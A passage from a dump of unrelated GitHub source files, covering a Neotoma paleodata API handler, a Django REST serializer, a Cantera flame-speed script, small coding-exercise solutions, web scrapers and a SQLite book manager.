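    return [loc['coordinates'][0][0][1], loc['coordinates'][0][0][0]]

point = {'type': 'Point', 'coordinates': [-89.4, 43.07]}
poly = {'type': 'Polygon',
        'coordinates': [[[-90.0, 43.0], [-89.0, 43.0], [-89.0, 44.0],
                         [-90.0, 44.0], [-90.0, 43.0]]]}
print(modern_coords(point))   # [43.07, -89.4]
print(modern_coords(poly))    # [43.0, -90.0]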
data.update(lat=modern[0], lon=modern[1])\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef occurrences(resp_json, return_obj, options):\n \"\"\"Extract occurrence data from the subquery.\"\"\"\n import geojson\n from ..elc import ages, geog\n from statistics import mean\n\n # Utlity function: Choose the existing, non-empty parameter\n def choose(x, y): return x or y\n\n # Utility function: Choose the greater of two numbers\n def greater(x, y): return x if x > y else y\n\n factor = ages.set_age_scaler(options=options, db='neotoma')\n\n for rec in resp_json.get('data', []):\n\n data = dict()\n \n data.update(db='neotoma')\n data.update(occ_id='neot:occ:{0:d}'.format(choose(rec.get('occid'), 0)))\n \n # Taxonomic information\n if rec.get('sample'):\n sample = rec.get('sample')\n data.update(taxon=sample.get('taxonname'))\n data.update(taxon_id='neot:txn:{0:d}'\n .format(choose(sample.get('taxonid'), 0)))\n\n # Record age (unit scaled)\n if rec.get('age'):\n\n old = choose(rec.get('age').get('ageolder'),\n rec.get('age').get('age'))\n if old and old >= 0:\n data.update(max_age=round(old / factor, 5))\n else:\n data.update(max_age=None)\n\n yng = choose(rec.get('age').get('ageyounger'),\n rec.get('age').get('age'))\n if yng and yng >= 0:\n data.update(min_age=round(yng / factor, 5))\n else:\n data.update(min_age=None)\n\n # General site level information\n if rec.get('site'):\n site = rec.get('site')\n\n # Dataset level information\n data.update(elevation=site.get('altitude'))\n data.update(source=site.get('database'))\n data.update(data_type=site.get('datasettype'))\n if site.get('datasetid'):\n data.update(locale_id='neot:dst:{0:d}'\n .format(choose(site.get('datasetid'), 0)))\n else:\n data.update(locale_id=None)\n\n # Paleo and modern coordinates\n if site.get('location'):\n loc = geojson.loads(site.get('location'))\n if loc.get('type').lower() == 'point':\n modern = [loc.get('coordinates')[1],\n loc.get('coordinates')[0]]\n else:\n modern = [loc.get('coordinates')[0][0][1],\n loc.get('coordinates')[0][0][0]]\n if options.get('geog') == 'paleo':\n m_age = greater(mean(modern) / 1e6, 1)\n try:\n paleo, ref = geog.resolve_geog(lat=modern[0],\n lon=modern[1],\n mean_age=round(m_age))\n paleo = [round(x, 4) for x in paleo]\n data.update(lat=paleo[0], lon=paleo[1])\n except ValueError as err:\n # data.update(lat=modern[0], lon=modern[1])\n data.update(lat='({0:4.2f})'.format(modern[0]),\n lon='({0:4.2f})'.format(modern[1]))\n else:\n data.update(lat=modern[0], lon=modern[1])\n else:\n data.update(lat=None, lon=None)\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef references(resp_json, return_obj, options):\n \"\"\"Extract references from the subquery.\"\"\"\n pubs = resp_json.get('data')\n\n # Utlity function: if 1st param is '', 0 or None return 2nd param\n def choose(x, y): return x or y\n\n for rec in pubs.get('result', []):\n\n # Available fields\n data = {'db': 'neotoma',\n 'year': rec.get('year'),\n 'journal': rec.get('journal'),\n 'doi': rec.get('doi'),\n 'cite': rec.get('citation'),\n 'page_range': rec.get('pages'),\n 'kind': rec.get('publicationtype')}\n\n # Reference title\n data.update(title=rec.get('booktitle', rec.get('title')))\n\n # Reference number\n data.update(ref_id='neot:pub:{0:d}'\n .format(choose(rec.get('publicationid'), 0)))\n\n # Publisher information\n if rec.get('city') and rec.get('country'):\n data.update(place='{0:s}, {1:s}'.format(rec.get('city'),\n rec.get('country')))\n else:\n data.update(place=rec.get('country'))\n\n # Publication 
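One detail shared by the locales(), mobile() and occurrences() decoders above: the choose helper is implemented as `x or y`, so any falsy first argument falls through to the fallback, and the `if old and old >= 0` guard likewise treats a value of exactly 0 as missing. A standalone sketch of that pattern; scale_age_range is a hypothetical condensation of the age blocks, and the factor 1000.0 merely stands in for whatever ages.set_age_scaler() actually returns.

def choose(x, y):
    return x or y            # as in the decoders: '', 0 and None all fall through

def scale_age_range(age_rec, factor):
    # age_rec mimics rec['age'] from the Neotoma payload
    old = choose(age_rec.get('ageolder'), age_rec.get('age'))
    yng = choose(age_rec.get('ageyounger'), age_rec.get('age'))
    max_age = round(old / factor, 5) if old and old >= 0 else None
    min_age = round(yng / factor, 5) if yng and yng >= 0 else None
    return min_age, max_age

print(scale_age_range({'ageolder': 12500, 'ageyounger': 11400}, 1000.0))
# (11.4, 12.5)
print(scale_age_range({'ageolder': 12500, 'ageyounger': 0}, 1000.0))
# (None, 12.5) -- an age of exactly 0 is indistinguishable from "missing"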
volume(number) or edition\n if rec.get('issue') and rec.get('volume'):\n data.update(vol_no='{0:s} ({1:s})'.format(rec.get('volume'),\n rec.get('issue')))\n elif rec.get('volume'):\n data.update(vol_no=rec.get('volume'))\n\n else:\n data.update(vol_no=rec.get('edition'))\n\n # Publication authors (not always complete in Neotoma record)\n if rec.get('authors'):\n authors = set()\n for author in rec.get('authors'):\n if author.get('familyname'):\n surname = '{0:s},'.format(author['familyname'])\n if author.get('givennames'):\n names = author['givennames'].split()\n fi = '{0:s}.'.format(names[0][0])\n if len(names) > 1:\n mi = '{0:s}.'.format(names[1][0])\n else:\n mi = ''\n authors.add('{0:s} {1:s} {2:s}'.format(surname, fi, mi))\n author_list = list(authors)\n else:\n author_list = []\n data.update(authors=author_list)\n\n # Not currently available directly in Neotoma\n data.update(publisher=None, editor=None)\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef bbox_filter ( wkt_string, lonmin, latmin, lonmax, latmax ):\n \"\"\"\n Return a string that will select records from the geographic range\n given in WKT. If four bounding coordinates are given instead, a\n POLYGON() is constructed from them.\n \"\"\"\n \n if wkt_string:\n return {'loc': wkt_string}\n\n elif lonmin or latmin or lonmax or latmax:\n pattern = 'POLYGON(({0} {1},{2} {1},{2} {3},{0} {3},{0} {1}))'\n return {'loc': pattern.format(lonmin, latmin, lonmax, latmax)}\n\n else:\n return {}\n\n","repo_name":"EarthLifeConsortium/elc_api","sub_path":"swagger_server/handlers/neotoma.py","file_name":"neotoma.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"12281537618","text":"from rest_framework import serializers\n\nfrom posts.models import Comment, Follow, Group, Post, User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ('id', 'username', 'first_name', 'last_name')\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = ('title', 'slug', 'description')\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = serializers.StringRelatedField(read_only=True)\n post = serializers.SlugRelatedField(read_only=True, slug_field='id')\n\n class Meta:\n model = Comment\n fields = ('id', 'author', 'post', 'text', 'created')\n\n\nclass PostSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(\n read_only=True,\n slug_field='username')\n\n class Meta:\n model = Post\n fields = ('id', 'text', 'author', 'image', 'group', 'pub_date')\n\n\nclass FollowSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(\n read_only=True,\n slug_field='username',\n default=serializers.CurrentUserDefault()\n )\n following = serializers.SlugRelatedField(\n slug_field='username',\n queryset=User.objects.all()\n )\n\n class Meta:\n model = Follow\n fields = ('user', 'following')\n validators = [\n serializers.UniqueTogetherValidator(\n queryset=Follow.objects.all(),\n fields=('user', 'following'),\n message='Подписка на данного автора уже оформлена'\n )\n ]\n\n def validate_following(self, value):\n if self.context.get('request').user == value:\n raise serializers.ValidationError(\n 'Пользователь не может подписаться на самого себя'\n )\n return 
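The bbox_filter() helper at the end of the Neotoma module above builds a closed WKT ring from four bounding coordinates. A quick standalone check of the string it produces:

pattern = 'POLYGON(({0} {1},{2} {1},{2} {3},{0} {3},{0} {1}))'
print(pattern.format(-90, 40, -85, 45))
# POLYGON((-90 40,-85 40,-85 45,-90 45,-90 40))
# counter-clockwise ring, closed by repeating the first vertex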
value\n","repo_name":"OrdinaryWorker/api_service_yatube","sub_path":"yatube_api/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12900861695","text":"\nimport numpy as np\nfrom mpi4py import MPI\nimport h5py\nimport subprocess\nimport cantera as ct\n\n\nfuel = 'nc7h16'\noxid = 'o2:1, n2:3.76'\nkey_chem = 'Lu'\n\nchemPath_cti = 'KineticModels/Chem/nHeptane/Lu/sk88/chem.yaml'\n\nmin_phi = 0.5\nmax_phi = 2.0\ndel_phi = 0.05\nmin_temp = 300.0\nmax_temp = 1000.0\ndel_temp = 25.0\nmin_presAtm = 1.0\nmax_presAtm = 1.0\ndel_presAtm = 1.0\n\nsavedir = 'Results_SL'\nsubprocess.call(['mkdir','-p', savedir])\n\nflag_save_profile = True\nif flag_save_profile:\n savedir_profile = 'Results_SL_profile/profile_{}_hdf'.format(key_chem)\n subprocess.call(['mkdir','-p', savedir_profile])\n\narray_phi = np.arange(min_phi, max_phi+del_phi/10.0, del_phi)\narray_temp = np.arange(min_temp, max_temp+del_temp/10.0, del_temp)\narray_presAtm = np.arange(min_presAtm, max_presAtm+del_presAtm/10.0, del_presAtm)\narray_pres = ct.one_atm*array_presAtm\n\narray_width = np.array([0.1, 0.05, 0.02, 0.01, 0.005, 0.002, 0.001, 0.0005, 0.0002]) # m\narray_width = np.array([0.02, 0.01, 0.005, 0.002, 0.001, 0.0005]) # m\narray_width = np.array([0.003]) # m\n\n# Set case number in each process\ncaseNumber_width = array_width.shape[0]\ncaseNumber_temp = array_temp.shape[0]\ncaseNumber_pres = array_pres.shape[0]\ncaseNumber_phi = array_phi.shape[0]\ncaseNumber_all = caseNumber_width*caseNumber_temp* \\\n caseNumber_pres*caseNumber_phi\n\n# MPI settings\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nwork1 = (caseNumber_all)//size\nwork2 = (caseNumber_all)%size\ncaseNumber_sta = rank*work1 + min(rank, work2)\ncaseNumber_end = caseNumber_sta + work1-1\nif (work2 > rank): caseNumber_end += 1\nprint('Rank:{:>2}, Case:{:>3}-{}, Total case: {}'.format(\\\n rank, caseNumber_sta, caseNumber_end, caseNumber_all))\n\ncaseNumber = 0\ncasePTdict = {}\nfor cur_width in array_width:\n for cur_phi in array_phi:\n for cur_pres in array_pres:\n for cur_temp in array_temp:\n casePTdict[caseNumber] = [cur_width, cur_phi, cur_pres, cur_temp]\n caseNumber += 1\n\nfilename_sl_hdf = '{}/Results_SL_{}.h5'.format(savedir, key_chem)\nf_sl = h5py.File(filename_sl_hdf, 'w', driver='mpio', comm=MPI.COMM_WORLD)\n\ndsetwidth = f_sl.create_dataset('width',(caseNumber_width,),dtype=\"f\")\ndsetphi = f_sl.create_dataset('phi', (caseNumber_phi,), dtype=\"f\")\ndsetT = f_sl.create_dataset('T', (caseNumber_temp,), dtype=\"f\")\ndsetp = f_sl.create_dataset('p', (caseNumber_pres,), dtype=\"f\")\ndsetpAtm = f_sl.create_dataset('p_atm',(caseNumber_pres,), dtype=\"f\")\ndsetwidth[:] = array_width\ndsetphi[:] = array_phi\ndsetT[:] = array_temp\ndsetp[:] = array_pres\ndsetpAtm[:] = array_presAtm\n\ngrp = f_sl.create_group('SL')\ndsetSL = grp.create_dataset('SL', (caseNumber_all,6), dtype=\"f\")\n\ngas = ct.Solution(chemPath_cti)\n\nfor caseNumber in range(caseNumber_sta, caseNumber_end+1):\n\n cur_width = float(casePTdict[caseNumber][0])\n cur_phi = float(casePTdict[caseNumber][1])\n cur_p = float(casePTdict[caseNumber][2])\n cur_p_atm = cur_p/ct.one_atm\n cur_T = float(casePTdict[caseNumber][3])\n\n gas.TP = (cur_T, cur_p)\n gas.set_equivalence_ratio(cur_phi, fuel=fuel, oxidizer=oxid)\n\n # Set up flame object\n f = ct.FreeFlame(gas, width=cur_width)\n f.set_refine_criteria(ratio=3, slope=0.06, 
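calc_SL.py above splits caseNumber_all flame calculations across MPI ranks by integer division plus remainder spreading: the first `work2` ranks get `work1 + 1` cases each, the rest get `work1`. A standalone check (no mpi4py needed) that the start/end formula tiles the case range exactly once; case_range is an illustrative condensation of the rank arithmetic in the script.

def case_range(rank, size, n_cases):
    work1, work2 = n_cases // size, n_cases % size
    start = rank * work1 + min(rank, work2)
    end = start + work1 - 1
    if work2 > rank:
        end += 1
    return start, end

n_cases, size = 23, 5
covered = []
for rank in range(size):
    start, end = case_range(rank, size, n_cases)
    covered.extend(range(start, end + 1))
assert covered == list(range(n_cases))
print('partition covers all', n_cases, 'cases exactly once')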
curve=0.12)\n\n # Solve with mixture-averaged transport model\n f.transport_model = 'Mix'\n loglevel = 0 # amount of diagnostic output (0 to 8)\n\n print('Case = {:>4}, width={}, phi={:.2f}, p={}, T={}'.format(caseNumber, \\\n cur_width, cur_phi, cur_p, cur_T))\n\n try:\n\n f.solve(loglevel=loglevel, auto=False)\n\n # Save to HDF container file if h5py is installed\n\n dsetSL[caseNumber] = [cur_width, cur_phi, cur_p, cur_p_atm, cur_T, f.velocity[0]]\n\n if flag_save_profile:\n\n try:\n f.write_hdf('{}/adiabaticFlame_width{}_phi{:.2f}_p{}_T{}.h5'\\\n .format(savedir_profile, cur_width, cur_phi, cur_p, cur_T),\n group='mix', mode='w', description='solution with mixture-averaged transport')\n except ImportError:\n f.write_csv('{}/adiabaticFlame_width{}_phi{:.2f}_p{}_T{}.csv'\\\n .format(savedir_profile, cur_width, cur_phi, cur_p, cur_T), quiet=False)\n\n print('mixture-averaged flamespeed = {0:7f} m/s, maximum HRR = {1} W/m^3'\\\n .format(f.velocity[0], max(f.heat_release_rate)))\n\n except:\n\n dsetSL[caseNumber] = [cur_width, cur_phi, cur_p, cur_p_atm, cur_T, 0]\n f.write_hdf('{}/adiabaticFlame_width{}_phi{:.2f}_p{}_T{}.h5_failure'\\\n .format(savedir_profile, cur_width, cur_phi, cur_p, cur_T), \\\n group='mix', mode='w', description='solution with mixture-averaged transport')\n\n print('Failure')\n\n del f\n\nf_sl.close()\n\n","repo_name":"Keisuke043/Cantera_IDTSL","sub_path":"nHeptane_Lu/calc_SL.py","file_name":"calc_SL.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38748369513","text":"n = int(input())\nresult = ''\n\nfor i in range(1, n+1):\n number = str(i)\n cnt = 0\n flag = False\n for num in number:\n if num in ['3', '6', '9']:\n cnt += 1\n flag = True\n if flag:\n result += '-'*cnt + \" \"\n else:\n result += number + \" \"\n\nprint(result)","repo_name":"kseenyoung/SWExpertAcademy","sub_path":"D2(RE)/1926 간단한 369게임.py","file_name":"1926 간단한 369게임.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33972382044","text":"# B. 
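The 369-game snippet above counts how many of the digits 3, 6 and 9 appear in each number and prints that many dashes, or the number itself when there are none. A compact, behavior-equivalent sketch of the same rule for a single number (clap_or_number is an illustrative name, not from the record):

def clap_or_number(i):
    # count digits that trigger a "clap" in the 369 game
    claps = sum(ch in '369' for ch in str(i))
    return '-' * claps if claps else str(i)

assert clap_or_number(3) == '-'
assert clap_or_number(36) == '--'
assert clap_or_number(14) == '14'
print(' '.join(clap_or_number(i) for i in range(1, 20)))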
Unhappy Hacking (ABC Edit)\n# Difficulty: brown\n# URL: https://atcoder.jp/contests/abc043/tasks/abc043_b\n\ns = input()\nS = \"\"\nfor i in s:\n if i == \"0\":\n S += \"0\"\n elif i == \"1\":\n S += \"1\"\n else:\n S = S[:-1]\nprint(S)\n\n# AC\n# Complete at 2023-07-16T04:36:43.503Z","repo_name":"kangping-git/atcoder_Brown","sub_path":"abc043_b.complete.py","file_name":"abc043_b.complete.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15002203616","text":"# -*- coding: utf-8 -*-\n# @Date : 2018-08-12 11:38:06\n# @Author : mohailang (1198534595@qq.com)\n\n\nclass Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # 关键思想:如果前i 个元素的和都没有第i 个元素大,那倒不如直接从这个元素开始找连续数组\n localSum = nums[0] # 保存前i 个元素的和或者第 i个的元素本身,看两者之间哪个比较大(局部最优)\n globalSum = nums[0] # 存储遍历以来最大的localSum值\n length = len(nums)\n for i in range(1, length):\n localSum = max(localSum+nums[i], nums[i])\n globalSum = max(localSum, globalSum)\n return globalSum\n\n # 当前面的累加和thisSum小于0是就置0,丢弃,大于maxSum时,把值赋给maxSum\n thisSum = 0\n maxSum = 0\n for i in range(len(nums)):\n thisSum += nums[i]\n if thisSum > maxSum:\n maxSum = thisSum\n elif thisSum < 0:\n thisSum = 0\n return maxSum\n","repo_name":"WaveMo/Language","sub_path":"Python3/初级算法/动态规划/最大子序和.py","file_name":"最大子序和.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73414733869","text":"import os\nfrom shutil import copy2\n\nimg_folder = 'images'\nann_folder = 'annotations'\nn_folder = 'output_files'\n\nimg_n_folder = os.path.join(n_folder,img_folder)\nann_n_folder = os.path.join(n_folder,ann_folder)\n\n\ntotal_xml_files = len(os.listdir(ann_folder))\n\nif not os.path.exists(n_folder):\n os.mkdir(n_folder)\n os.mkdir(img_n_folder)\n os.mkdir(ann_n_folder)\nelse:\n print('{}/ existe, processo abortado!!!'.format(n_folder))\n exit()\n\n\nx = 0\np = round(total_xml_files / 100)\n\nfor n,image_file in enumerate(os.scandir(img_folder)):\n img_name = image_file.name\n xml_name = image_file.name.split('.')[0] + '.xml'\n\n xml_path = os.path.join(ann_folder,xml_name)\n\n if os.path.exists(xml_path):\n x += 1\n if x % p == 0:\n print('{}/{} {}%\\n'.format(x,total_xml_files, (x*100/total_xml_files)))\n \n n_xml_file = os.path.join(n_folder,xml_path)\n n_img_path = os.path.join(n_folder,image_file.path)\n\n copy2(image_file.path,n_img_path)\n copy2(xml_path,n_xml_file)\n\n err = False\n if not os.path.exists(n_xml_file):\n print('Erro ao copiar {}'.format(n_xml_file))\n err = True\n if not os.path.exists(n_img_path):\n print('Erro ao copiar {}'.format(n_img_path))\n err = True\n\n if err:\n x -= 1\nprint('{}/{} {}%\\n'.format(x,total_xml_files, (x*100/total_xml_files)))\nprint('Fim')\n ","repo_name":"DanielCastriani/Dataset-Annotations-Generator","sub_path":"file_transfer.py","file_name":"file_transfer.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5191751936","text":"from typing import List, Dict, Union\nfrom .database_connection import DatabaseConnection\n\n'''\nConcerned with storing and retriving books from database\n'''\nbook = Dict[str, Union[str, int]]\nbooks_file = 'data.db'\n\ndef create_book_table() -> None: #this is type hinting in python which we can use only in pychar which tells us whenever we call this function and try to 
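The maxSubArray record above carries its explanation in Chinese comments; in English: localSum is the best sum of a subarray ending at the current element (restart whenever extending the running sum is worse than the element alone), and globalSum is the best localSum seen so far. Note also that the file's second variant, which is unreachable dead code after the first return, initializes maxSum to 0 and would wrongly return 0 for an all-negative input. A minimal English-commented version of the live branch:

def max_sub_array(nums):
    local_sum = global_sum = nums[0]
    for x in nums[1:]:
        local_sum = max(local_sum + x, x)     # extend the subarray or restart at x
        global_sum = max(global_sum, local_sum)
    return global_sum

assert max_sub_array([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6   # [4, -1, 2, 1]
assert max_sub_array([-3, -1, -2]) == -1                     # all-negative case
print('Kadane OK')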
assign its value to anything that its returns nothing\n # database connection example as context manager\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n cursor.execute('Create table books(name text primary key, author text, read integer)')\n '''\n using the database connection normally\n connection = sqlite3.connect(books_file)\n cursor = connection.cursor()\n \n SQLITE only supports only 5 types of data namely: NULL, INTEGER, REAL(floating number), TEXT, BLOB(binary data field to store images, pdf and other stuff)\n \n cursor.execute('Create table books(name text primary key, author text, read integer)')\n\n connection.commit()\n connection.close()'''\n\ndef add_book(name: str, author: str) -> None: #we can also use type hinting for parameters which tells us that what type of data a fun is expectin and can give warnin if there is a data typs mismatch\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n #below statement is not recommended in dqlite execute because of the f string, so we will do another approach. It causes sql injection attack\n #cursor.execute(f'Insert into books values(\"{name}\", \"{author}\", 0)') #giving double quotes so that sqlite should know that we are giving strings\n cursor.execute('Insert into books values(?, ?, 0)', (name, author)) #sqlite automatically puts the value of name and author in the place specified by ? order wise\n\n\ndef list_books() -> List[book]: # for list and dict we need to import the required module which tells which type it belongs to the calling side\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n\n cursor.execute('Select * from books')\n #books = cursor.fetchall() #fetch all the rows of the books table, gives list of tuples [(name , author read), (name, author, read)]\n #instead of above statement we can do a dictionary comprehension to have all the details in the same format as we want\n\n books = [{'name': row[0], 'author': row[1], 'read': row[2]} for row in cursor.fetchall()]\n\n return books\n\ndef mark_read_book(name) -> None: #we can use this type hinting only in pycharm as pychar only supports it for efficient coding\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n\n cursor.execute('Update books set read=1 where name = ?', (name,)) #we should always give the values as tuple or else it will execute it as arguments\n\n\ndef delete_book(name) -> None:\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n\n cursor.execute('Delete from books where name = ?', (name,))\n","repo_name":"anishverma2/MyLearning","sub_path":"Milestone Project 2/utils/databases_sqlite.py","file_name":"databases_sqlite.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6014383597","text":"from django.shortcuts import render,redirect\nfrom.forms import productAddform\nfrom django.contrib import messages\nfrom.models import ProductDetails\n\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n@login_required(login_url=\"SignIn\")\ndef Addproducts(request):\n form = productAddform()\n if request.method==\"POST\":\n form = productAddform(request.POST,request.FILES)\n if form.is_valid():\n product = form.save()\n product.merchant = request.user\n product.save()\n messages.info(request,\"Product Added To list\")\n return redirect('Addproducts')\n \n return 
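The comments in databases_sqlite.py above stress the key point: never splice values into the SQL string (f-strings invite injection); pass them as a tuple bound to ?-placeholders. A self-contained demo of that point using an in-memory database instead of the module's DatabaseConnection helper:

import sqlite3

conn = sqlite3.connect(':memory:')
cur = conn.cursor()
cur.execute('CREATE TABLE books(name TEXT PRIMARY KEY, author TEXT, read INTEGER)')
# even a hostile title is stored verbatim instead of being executed as SQL
title = 'clean"); DROP TABLE books;--'
cur.execute('INSERT INTO books VALUES (?, ?, 0)', (title, 'anon'))
cur.execute('SELECT name FROM books WHERE name = ?', (title,))   # note the 1-tuple
print(cur.fetchone())
conn.close()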
render(request,\"addproduct.html\",{\"form\":form})\n\n@login_required(login_url=\"SignIn\")\ndef ProductViewMerchant(request):\n products = ProductDetails.objects.all()\n context ={\n \"products\":products\n }\n return render(request,\"productlistview.html\",context)\n\n@login_required(login_url=\"SignIn\")\ndef DeleteProduct(request,pk):\n product = ProductDetails.objects.get(productId = pk)\n product.product_image.delete()\n product.delete()\n messages .info(request,\"product deleted\")\n return redirect(\"ProductViewMerchant\")\n\n@login_required(login_url=\"SignIn\")\ndef updateproduct(request,pk):\n product=ProductDetails.objects.filter(productId=pk)\n if request.method == \"POST\":\n \n \n pname = request.POST[\"pname\"]\n pbrand = request.POST[\"pbrand\"]\n pdisc = request.POST[\"pdisc\"]\n pstock = request.POST[\"pstock\"]\n pcat = request.POST[\"pcat\"]\n price = request.POST[\"price\"]\n image = request.FILES[\"image\"]\n \n item = ProductDetails.objects.get(productId=pk)\n \n item.produc_tName =pname\n item.product_Brand =pbrand\n item.product_Discription =pdisc\n item. product_price= price\n item.product_category =pcat\n item.product_stock =pstock\n item.product_image.delete()\n item.product_image = image\n item.save()\n messages.info(request,\"item updated\")\n return redirect(\"updateproduct\",pk=pk)\n context={\n \"product\":product\n }\n return render(request,\"updateproduct.html\",context)\n\ndef viewproduct(request,pk):\n product=ProductDetails.objects.filter(productId=pk)\n context = {\n \"product\":product\n }\n return render(request,\"viewproduct.html\",context)\n\ndef CartView (request):\n return render(request,\"cart.html\")","repo_name":"NavyaChandran139/Ecommerce","sub_path":"Product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"260142660","text":"from typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __str__(self) -> str:\n node = self\n response = ''\n while node:\n response += f'{node.val}, '\n node = node.next\n\n response = response[:-2]\n return response\n\n def __repr__(self) -> str:\n return str(self.val)\n\nclass Solution:\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n list = self.nodeToList(head)\n len_list = len(list)\n\n if k == 1:\n return head\n\n if len_list < k:\n return head\n\n if k == len_list:\n return self.listToNode(list[::-1])\n\n result = []\n previous = 0\n\n for i in range(k, len_list + 1, k):\n result += list[previous:i][::-1]\n previous = i\n\n module = len_list % k\n if module != 0:\n result += list[-module:]\n\n return self.listToNode(result)\n \n\n\n def listToNode(self, nums):\n if len(nums) > 0:\n node = ListNode(nums[0], self.listToNode(nums[1:]))\n return node\n return None\n\n def nodeToList(self, node):\n result = [node.val]\n while node.next:\n node = node.next\n result.append(node.val)\n return result\n\nif __name__ == '__main__':\n solution = Solution()\n l = solution.listToNode([1,2,3,4,5,6])\n print(solution.reverseKGroup(l, 2))","repo_name":"CaioRuizz/leetcode-problems","sub_path":"Reverse Nodes in k-Group/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36461761911","text":"from bs4 import BeautifulSoup\nimport requests\nfrom 
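The reverseKGroup solution above flattens the linked list, reverses it k elements at a time, and leaves a final partial group untouched. The same slicing logic on a plain Python list, as a standalone sketch (reverse_k_group is an illustrative name):

def reverse_k_group(vals, k):
    out = []
    cutoff = len(vals) - len(vals) % k
    for i in range(0, cutoff, k):
        out.extend(reversed(vals[i:i + k]))
    out.extend(vals[cutoff:])     # leftover group shorter than k stays as-is
    return out

assert reverse_k_group([1, 2, 3, 4, 5, 6], 2) == [2, 1, 4, 3, 6, 5]
assert reverse_k_group([1, 2, 3, 4, 5], 3) == [3, 2, 1, 4, 5]
print('k-group reversal OK')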
my_web.GeoInfo.models import (\n Estado,\n Ciudad,\n)\n\n\ndef fetch_hidalgo():\n hidalgo = Estado.objects.filter(nombre__icontains='hidalgo').first()\n\n if hidalgo is not None:\n url = 'https://es.wikipedia.org/wiki/Anexo:Municipios_del_estado_de_Hidalgo'\n response = requests.get(url)\n if response.ok:\n html = response.content\n soup = BeautifulSoup(html)\n tablas = soup.findAll('table')\n if len(tablas) > 0:\n tabla = tablas[0]\n lineas = tabla.findAll('tr')\n for linea in lineas:\n columnas = linea.findAll('td')\n if len(columnas) > 2:\n nombre = columnas[1].text.strip()\n instance, created = Ciudad.objects.get_or_create(nombre=nombre, estado=hidalgo)\n print(\"Ciudad: {} fue Creada: {} - {}\".format(\n nombre,\n created,\n instance\n ))\n else:\n print(\"Algo salio mal\")\n else:\n print(\"El estado no existe\")\n","repo_name":"R3SWebDevelopment/CeroUnoApprenticeshipProgramPython","sub_path":"django/project/my_web/my_utils/GeoInfoFetcher.py","file_name":"GeoInfoFetcher.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"71819664749","text":"\nfrom lxml.html import tostring, fromstring\nimport requests\n\n\ndef main():\n # 세션\n session = requests.Session()\n # 크롤�� 대상 URL\n response = session.get(\"https://www.naver.com\")\n # 신문 링크 리스트 획득\n urls = scrape_news_list_page(response)\n\n # 딕셔너리 타입으로 출력\n print(urls)\n\n # 결과 출력\n for name, url in urls.items():\n print(name, url)\n\n\ndef scrape_news_list_page(response):\n urls = {}\n\n root = fromstring(response.content)\n\n for a in root.xpath('//div[@class=\"thumb_area\"]/div[@class=\"thumb_box _NM_NEWSSTAND_THUMB _NM_NEWSSTAND_THUMB_press_valid\"]'):\n\n name, url = extract_contents(a)\n urls[name] = url\n\n # print(tostring(a, pretty_print=True))\n\n return urls\n\n\ndef extract_contents(dom):\n link = dom.xpath(\"./div/a\")[2].get('href')\n name = dom.xpath(\"./a/img\")[0].get('alt')\n\n return name, link\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"evnif11/crawling-basic","sub_path":"section02-4.py","file_name":"section02-4.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36577402325","text":"import pytest\nfrom django.urls import reverse\nfrom django.test import TestCase\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\npytestmark = pytest.mark.django_db\n\n\nclass TestNetwork(TestCase):\n url = reverse('add_network')\n post_data_network1 = {\n 'network_name': 'Network010',\n 'network_description': 'Description of Network1',\n 'located_in_cloud': True\n }\n post_data_network2 = {\n 'network_name': 'Network020',\n 'network_description': 'Description of Network2',\n 'located_in_cloud': True\n }\n\n def 